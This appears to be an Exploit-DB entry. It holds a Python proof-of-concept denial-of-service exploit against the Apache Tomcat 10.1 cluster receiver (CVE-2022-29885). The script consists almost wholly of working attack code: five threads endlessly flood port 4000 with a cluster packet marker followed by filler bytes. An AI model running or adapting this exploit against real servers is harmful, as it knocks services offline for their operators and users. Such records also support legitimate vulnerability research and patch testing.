Apache Tomcat 10.1 – Denial Of Service

  • Author: Cristian Giustini
    Date: 2023-04-05
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/51262/
  • # Exploit Title: Apache Tomcat 10.1 - Denial Of Service
    # Google Dork: N/A
    # Date: 13/07/2022
    # Exploit Author: Cristian 'void' Giustini
    # Vendor Homepage: https://tomcat.apache.org/
    # Software Link: https://tomcat.apache.org/download-10.cgi
    # Version: <= 10.1
    # Tested on: Apache Tomcat 10.0 (Docker)
    # CVE : CVE-2022-29885 (CVE Owner: 4ra1n)
    # Exploit pre-requirements: pip install pwntools==4.8.0
    # Analysis : https://voidzone.me/cve-2022-29885-apache-tomcat-cluster-service-dos/

    #!/usr/bin/env python3
    # coding: utf-8

    from pwn import *
    import time
    import threading
    import subprocess

    threads = []


    def send_payload():
        # Connect to the cluster receiver on the local test instance
        # (4000 is the default Tomcat cluster receiver port).
        r = remote("localhost", 4000)
        while True:
            # "FLT2002" is the start-of-packet marker of the cluster
            # message format; it is followed by 10000 filler bytes.
            r.send(b"FLT2002" + b"A" * 10000)


    # Start five sender threads.
    for _ in range(5):
        new_thread = threading.Thread(target=send_payload)
        threads.append(new_thread)
        new_thread.start()

    # Wait for the sender threads (they loop until interrupted).
    for old_thread in threads:
        old_thread.join()